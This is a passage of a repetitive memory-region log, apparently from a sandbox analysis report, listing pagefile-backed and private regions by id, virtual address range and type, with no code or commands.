0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9518 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9519 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9520 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9521 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9522 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9523 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9524 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9525 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9526 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9527 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9528 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9529 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9530 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9531 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9532 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9533 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9534 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9535 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9536 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9537 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9538 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9539 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9540 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9541 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9542 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9543 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9544 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9545 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9546 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9547 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9548 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9549 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9550 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9551 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9553 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9554 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9555 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9556 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9557 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9558 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9559 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9560 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9561 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9562 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9563 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9564 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9565 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9566 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9567 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9568 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9569 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9570 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 9571 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9572 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9573 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9574 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9575 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9576 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9577 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9578 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9579 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9580 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9581 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9582 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9583 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9584 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9585 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9586 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9587 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9588 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9589 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9590 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9591 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9592 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9593 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9594 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9595 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9596 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9597 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9598 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9599 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9600 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9601 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9602 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9603 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9604 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9605 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9606 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9607 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9608 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9609 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9610 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9611 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9612 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9613 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9614 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9615 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9616 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9617 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9618 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9619 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9620 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9621 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9622 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9623 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9624 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9625 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9626 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9627 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9628 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9629 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9630 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9631 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9636 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9637 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9638 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9639 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9640 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9641 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9642 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9643 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9644 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9645 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9646 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9647 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9648 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9649 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9650 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9651 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9652 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9653 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9654 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9655 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9656 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9657 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9658 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9659 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9660 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9661 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9662 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9663 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9664 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9665 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9666 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9667 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9668 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9669 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9670 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9671 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9672 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9673 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9674 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9675 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9676 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9677 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9678 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9679 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9680 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9681 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9682 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9683 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9684 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9685 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9686 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9687 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9688 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9689 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9690 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9691 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 9692 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9693 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9694 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9695 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9696 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9697 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9698 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9699 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9700 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9701 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9702 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9703 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9704 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9705 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9706 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9707 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9708 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9709 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 